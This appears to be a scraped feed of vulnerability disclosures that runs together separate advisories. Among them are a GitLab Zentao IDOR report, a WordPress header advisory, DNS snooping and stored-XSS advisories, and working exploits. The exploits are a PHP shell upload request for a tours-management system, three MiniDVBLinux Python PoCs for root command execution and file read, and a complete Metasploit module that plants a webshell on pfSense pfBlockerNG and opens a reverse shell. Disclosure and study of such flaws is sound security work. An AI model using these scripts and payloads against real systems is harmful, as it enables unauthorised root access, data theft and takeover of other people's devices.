Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: XD201-MENG@QI

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/update\_settings.php

Loophole location: Online Tours & Travels management system's admin/settings.php file exists arbitrary file upload (RCE)

Request package for file upload:

POST /tour/admin/operations/update\_settings.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/settings.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------248921847826758
Content-Length: 1288
\-----------------------------248921847826758
Content-Disposition: form-data; name="title"
Tours and Travels
\-----------------------------248921847826758
Content-Disposition: form-data; name="f\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img"
favi.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="logo\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img1"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img2"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="currency"
1
\-----------------------------248921847826758
Content-Disposition: form-data; name="footer"
Nikhil B
\-----------------------------248921847826758
Content-Disposition: form-data; name="update"
\-----------------------------248921847826758--

The files will be uploaded to this directory \\tour\\admin\\settings 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42142: bug_report/RCE-1.md at main · xd201qaz/bug_report

Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

An issue has been discovered in GitLab EE affecting all versions starting from 14.5 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. GitLab's Zentao integration has an insecure direct object reference vulnerability that may be exploited by an attacker to leak Zentao project issues.

**HackerOne report #1542834** by joaxcar on 2022-04-16, assigned to @ngeorge1:

Report | How To Reproduce

**Report****Summary**

Maintainers of projects with a premium subscription have the option to enable "Zentao product integration" (documentation).

This enables users with access to the project to view a list of product issues synced from a connected Zentao product by visiting https://gitlab.com/GROUPNAME/PROJECTNAME/-/integrations/zentao/issues .

And issue details by visiting https://gitlab.com/GROUPNAME/PROJECTNAME/-/integrations/zentao/issues/ISSUE-KEY

When configuring this feature, the maintainer is made to enter a product ID

> ZenTao Product ID: To display issues from a single ZenTao product in a given GitLab project. The Product ID can be found in the ZenTao product page under Settings > Overview.

This is to connect the current GitLab project with the target Zentao product

The way GitLab handles this functionality is by requesting the maintainer to enter two things other than the project key

1.  Zentao instance URL
2.  Zentao API key

When a user visits the /-/integrations/zentao/issues page the GitLab backend makes a request towards Zentao like so

    https://username.zentao.net/api.php/v1/products/3/issues  

Which returns a list of all issues related to product with ID 3.

When clicking on one of these issues in the UI the user is redirected to /-/integrations/zentao/issues/issue-1 and the backend will make a request like so

    https://jihudemo.zentao.net/api.php/v1/issues/issue-1  

This request does not contain any check as to which product this issue is related. So by enumerating issue titles such as task-ID, bug-ID, story-ID and so on an attacker can enumerate all issues from all products the maintainer controls in its Zentao instance.

**A small discussion on CVSS**

I am not completely sure on how this is intended to work, and Zentao's English documentation is a bit sparse. But from what I have gathered in the GitLab documentation, and issues surrounding this, the intention is to connect ONE GitLab project with ONE Zentao product.

So any issues not related to this given product should not be accessible to other users.

My understanding of Zentao is that the user can organize issues in products, but all issues share names with incrementing values. So two products with two bug issues will create the four bug IDs

This is the same for issue types of task and story. This makes it extremely easy to enumerate these issues. Hence, the complexity scoring of Low.

There is also no restriction for this feature being used as the issue tracker for a public project. If this is done, the attacker can perform the attack unauthenticated.

I will report this with a CVSS which is the "highest possible impact" as nothing I have described above is outside "normal workflow". But as usual I understand that the scoring can be subject to change :)

**Steps to reproduce**

I will use the test account that is used in GitLab issues regarding Zentao. Zentao demo account from #338178 (closed)

> Zentao Web URL: https://jihudemo.zentao.net  
> Zentao API token: a70fe861f1e60a3bfd857133798f2f1f  
> Zentao Product ID: 4

1.  Create a user to use as the victim
2.  Create a new public project (with minimum premium access to GitLab)
3.  In the project page go to  
    https://gitlab.com/GROUPNAME/PROJECTNAME/-/integrations/zentao/edit
4.  Fill in the test credentials from above (use product ID 4 as this one only contains one issue)
5.  Click save
6.  Log out
7.  Go to  
    https://gitlab.com/GROUPNAME/PROJECTNAME/-/integrations/zentao/issues
8.  The page will list all issues related to the Product. In this case ONE bug issue
9.  Click the issue (bug-8) and you will go to  
    https://gitlab.com/GROUPNAME/PROJECTNAME/-/integrations/zentao/issues/bug-8
10.  Now change bug-8 to bug-1
11.  Details of another product is shown
12.  Start enumerating

**Impact**

Zentao integration leaks a user's ALL issues from ALL products even if the documentation states that it will show issues from ONE product

**Examples**

Visit my public project at

https://gitlab.com/ultimate\_joaxcar\_2/kk/-/integrations/zentao/issues

This is accessible as an unauthenticated user.

Try to enumerate issues with names such as bug-1, task-1 and story-1

**What is the current _bug_ behavior?**

GitLab uses Zentao issue key directly from attacker supplied URL without matching it to the configured product key.

**What is the expected _correct_ behavior?**

A project should only fetch keys that match the configured key base

**Output of checks**

This bug happens on GitLab.com

**Impact**

Zentao integration leaks a user's ALL issues from ALL products even if the documentation states that it will show issues from ONE product

**How To Reproduce**

Please add reproducibility information to this section:

CVE-2022-3331: IDOR in Zentao integration leaks details of issues from a users other "products" (#360372) · Issues · GitLab.org / GitLab · GitLab

A flaw was found in Wordpress 5.1. "X-Forwarded-For" is a HTTP header used to carry the client's original IP address. However, because these headers may very well be added by the client to the requests, if the systems/devices use IP addresses which decelerate at X-Forwarded-For header instead of original IP, various issues may be faced. If the data originating from these fields is trusted by the application developers and processed, any authorization checks originating IP address logging could be manipulated.

**Full Disclosure mailing list archives**

_From_: Alphan YAVAS <alphan.yv () gmail com>  
_Date_: Tue, 9 Mar 2021 13:18:08 +0300  

I. VULNERABILITY
-------------------------
Data Manipulation with X-Forwarded-For header at WordPress

II. CVE REFERENCE
-------------------------
CVE-2020-35539

III. VENDOR
-------------------------
https://wordpress.org

IV. TIMELINE
-------------------------
20/12/2020 Vulnerability discovered
21/12/2020 Vendor contacted
09/03/2021 CVE Assigned

V. CREDIT
-------------------------
Alphan Yavas

VI. DESCRIPTION
-------------------------
"X-Forwarded-For" is a HTTP header used to carry the client's original
IP address. However, because these headers may very well be added by
the client to the requests, if the systems/devices use IP addresses
which decelerate at X-Forwarded-For header instead of original IP,
various issues may be faced. If the data originating from these fields
is trusted by the application developers and processed, any
authorization checks originating IP address logging could be
manipulated.

VII. PROOF OF CONCEPT
-------------------------
Affected Component: Wordpress core
Affected version Wordpress 5.1

-Add X-Forwarded-For header to the /wp-admin
-You will get an error about your IP
-Next go /wp-admin/admin-ajax.php and add X-Forwarded-For header again

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Data Manipulation with X-Forwarded-For header at WordPress** _Alphan YAVAS (Mar 11)_
    *   Re: Data Manipulation with X-Forwarded-For header at WordPress _jvoisin (Mar 16)_

CVE-2020-35539: Data Manipulation with X-Forwarded-For header at WordPress

MiniDVBLinux versions 5.4 and below suffer from an arbitrary file disclosure vulnerability.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Arbitrary File Read Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The distribution suffers from an arbitrary file disclosure# vulnerability. Using the 'file' GET parameter attackers can disclose# arbitrary files on the affected device and disclose sensitive and system# information.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5719# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUTif len(sys.argv) < 3:  print('MiniDVBLinux 5.4 File Disclosure PoC')  print('Usage: ./mldhd_fd.py [url] [file]')  sys.exit(17)else:    url = sys.argv[1]    fil = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file='+fil)outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))

MiniDVBLinux 5.4 Arbitrary File Read

RRX IOB LP version 1.0 suffers from a DNS cache snooping vulnerability.

    Document Title:===============RRX IOB LP v1.0 - DNS Cache Snooping VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2261Article:https://www.vulnerability-db.com/?q=articles/2022/10/11/rhein-ruhr-express-rrx-dns-cache-snooping-vulnerability-wifi-hotspotRelease Date:=============2022-10-11Vulnerability Laboratory ID (VL-ID):====================================2261Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================MultipleCurrent Estimated Price:========================2.000€ - 3.000€Product & Service Introduction:===============================This product, solution or service ("Product") contains third-party software components listed in this document. These components are Open SourceSoftware licensed under a license approved by the Open Source Initiative (www.opensource.org) or similar licenses as determined by SIEMENS ("OSS")and/or commercial or freeware software components. With respect to the OSS components, the applicable OSS license conditions prevail over any otherterms and conditions covering the Product. The OSS portions of this Product are provided royalty-free and can be used at no charge.If SIEMENS has combined or linked certain components of the Product with/to OSS components licensed under the GNU LGPL version 2 or later as per thedefinition of the applicable license, and if use of the corresponding object file is not unrestricted ("LGPL Licensed Module", whereas the LGPLLicensed Module and the components that the LGPL Licensed Module is combined with or linked to is the "Combined Product"), the following additionalrights apply, if the relevant LGPL license criteria are met: (i) you are entitled to modify the Combined Product for your own use, including but notlimited to the right to modify the Combined Product to relink modified versions of the LGPL Licensed Module, and (ii) you may reverse-engineer theCombined Product, but only to debug your modifications. The modification right does not include the right to distribute such modifications and youshall maintain in confidence any information resulting from such reverse-engineering of a Combined Product.Certain OSS licenses require SIEMENS to make source code available, for example, the GNU General Public License, the GNU Lesser General Public Licenseand the Mozilla Public License. If such licenses are applicable and this Product is not shipped with the required source code, a copy of this sourcecode can be obtained by anyone in receipt of this information during the period required by the applicable OSS licenses by contacting the following address.Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a dns snooping vulnerability in the Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.Vulnerability Disclosure Timeline:==================================2020-08-03: Researcher Notification & Coordination (Security Researcher)2020-08-04: Vendor Notification (Security Department)2020-08-27: Vendor Response/Feedback #1 (Security Department)2020-11-10: Vendor Response/Feedback #2 (Security Department)2021-01-30: Security Acknowledgements (Security Department)2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)2022-10-11: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================No User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A dns cache snooping vulnerability has been discovered in the official Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.The vulnerability allows remote attackers to determine resolved sites and name servers to followup with manipulative interactions.The vulnerability allows remote attackers to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.For instance, if an attacker was interested in whether your company utilizes the online services of a particular financial institution, they would be able to use this attackto build a statistical model regarding company usage of that financial institution. Of course, the attack can also be usead to find B2B partners, web-surfing patterns, externalmail servers, and more. If this is an internal DNS server not accessible to outside networks, attacks would be limited to the internal network. This may include employees,consultants and potentially users on a guest network or WiFi connection if supported.Proof of Concept (PoC):=======================The dns cache snooping vulnerability can be exploited by remote attackers with wifi guest access without user interaction or privileged user account.For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.--- PoC Session Logs ---Sent a non-recursive query for test.comand received 1 answer: dnsmasq-2.7593.184.216.34Hosts53 / udp / dns   192.168.44.1Solution - Fix & Patch:=======================Improve the cache management via dns to ensure no manipulations can take place.Contact the manufacturer siemens to resolve the issue by an automated or manual patch.2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)The patching process will be delivered by siemens during train maintenance and will take at least until 2022 Q2-Q3 to be rolled out on all trains (40+).Security Risk:==============The security risk of the web vulnerability in the siemens hotspot rxx wifi is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comServices:   magazine.vulnerability-lab.com  paste.vulnerability-db.com       infosec.vulnerability-db.comSocial:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab       youtube.com/user/vulnerability0labFeeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.phpPrograms:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.phpAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

RRX IOB LP 1.0 DNS Cache Snooping

MiniDVBLinux version 5.4 suffers from an OS command execution vulnerability. This can be exploited to execute arbitrary commands as root through the command GET parameter in /tpl/commands.sh.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command execution vulnerability.# This can be exploited to execute arbitrary commands as root, through the# 'command' GET parameter in /tpl/commands.sh.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5718# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php### 24.09.2022#import requestsimport re,sys#test case 002#http://ip:8008/?site=commands&section=system&command=sleep%201;reboot#-#test case 003#http://ip:8008/?site=commands&section=system&command=id#uid=0(root) gid=0(root)if len(sys.argv) < 3:  print('MiniDVBLinux 5.4 Command Execution PoC')  print('Usage: ./mldhd_root1.py [url] [cmd]')  sys.exit(17)else:    url = sys.argv[1]    cmd = sys.argv[2]req = requests.get(url+'/?site=commands&section=system&command='+cmd)req = requests.get(url+'/?site=commands&section=system&command='+cmd)outz = re.search('log\'>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('log\'>','').replace('</pre>',''))

MiniDVBLinux 5.4 Remote Root Command Execution

WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

MiniDVBLinux version 5.4 suffers from an OS command injection vulnerability. This can be exploited to execute arbitrary commands with root privileges.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command injection vulnerability.# This can be exploited to execute arbitrary commands with root privileges.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5717# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT#test case 004#http://ip:8008/?site=about&name=blind&file=$(id)#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directory#test case 005#http://ip:8008/?site=about&name=blind&file=`id`#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directoryif len(sys.argv) < 3:  print('MiniDVBLinux 5.4 Command Injection PoC')  print('Usage: ./mldhd_root2.py [url] [cmd]')  sys.exit(17)else:    url = sys.argv[1]    cmd = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))

MiniDVBLinux 5.4 Remote Root Command Injection

This Metasploit module leverages a remote shell upload vulnerability in pfSense pfBlockerNG plugin versions 2.1.4_26 and below. Note that version 3.x is unaffected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',        'Description' => %q{          pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.        },        'Author' => [          'IHTeam', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'CVE', '2022-31814' ],          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']        ],        'License' => MSF_LICENSE,        'Platform' => 'unix',        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_openssl'              }            }          ],          [            'BSD Dropper',            {              'Platform' => 'bsd',              'Arch' => [ARCH_X64],              'Type' => :bsd_dropper,              'CmdStagerFlavor' => [ 'curl' ],              'DefaultOptions' => {                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 1,        'DisclosureDate' => '2022-09-05',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [ CRASH_SERVICE_DOWN ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        OptString.new('WEBSHELL_NAME', [          false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil        ])      ]    )  end  def upload_shell    print_status 'Uploading shell...'    if datastore['WEBSHELL_NAME'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"    else      @webshell_name = "#{datastore['WEBSHELL_NAME']}.php"    end    @parameter_name = Rex::Text.rand_text_alpha(4..12)    print_status("Webshell name is: #{@webshell_name}")    web_shell_contents = <<~EOF      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');    EOF    encoded_php = web_shell_contents.unpack('H*')[0].upcase    send_request_raw(      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),      'headers' => {        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"      }    )    sleep datastore['WfsDelay']    register_file_for_cleanup("/usr/local/www/#{@webshell_name}")  end  def check    upload_shell    check_resp = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),      'vars_post' => {        @parameter_name.to_s => 'id'      }    )    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')    Exploit::CheckCode::Vulnerable  end  def execute_command(cmd, _opts = {})    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, @webshell_name),      'headers' => {        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'      },      'vars_post' => {        @parameter_name.to_s => cmd      }    })  end  def exploit    upload_shell unless datastore['AutoCheck']    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :bsd_dropper      execute_cmdstager    end  endend

